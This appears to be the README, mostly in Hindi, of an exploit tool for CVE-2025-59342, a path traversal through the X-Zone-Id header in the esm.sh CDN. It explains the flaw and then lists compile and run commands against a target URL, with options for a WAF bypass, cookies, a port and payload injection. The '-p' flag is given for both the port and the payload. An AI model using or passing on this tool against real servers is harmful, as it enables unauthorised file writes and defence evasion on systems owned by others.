
Exploit Path Traversal in esm-dev
लेखक: Byte Reaper
CVE-2025-59342 esm.sh में एक पथ ट्रैवर्सल कमजोरी है, जो आधुनिक वेब विकास के लिए एक बिना बिल्ड वाला कंटेंट डिलीवरी नेटवर्क (CDN) है, संस्करण 136 और उससे पहले में।
यह समस्या X-Zone-Id HTTP हेडर के प्रबंधन में मौजूद है, जिसका उपयोग फाइलसिस्टम पथ बनाने के लिए किया जाता है। हेडर मान को ठीक से कैननिकलाइज़ या एप्लिकेशन के स्टोरेज बेस डायरेक्टरी तक सीमित नहीं किया गया है।
परिणामस्वरूप, X-Zone-Id में ../ अनुक्रम प्रदान करने से फ़ाइलें इच्छित स्टोरेज स्थान के बाहर लिखी जा सकती हैं।
Linux x86_64
GCC
gcc exploit.c argparse.c -o CVE-2025-59342 -lcurl
./CVE-2025-59342 -u http://target (auto port = 80)
- वर्बोज़ मोड :
./CVE-2025-59342 -u http://target -v
- WAF बाइपास :
./CVE-2025-59342 -u http://target -v -b
- कुकीज़ फ़ाइल :
./CVE-2025-59342 -u http://target -c [FILE] -v
- लक्ष्य पोर्ट सर्वर :
./CVE-2025-59342 -u http://target -p [PORT]
- पेलोड :
./CVE-2025-59342 -u http://target -p [Payload injection]
MIT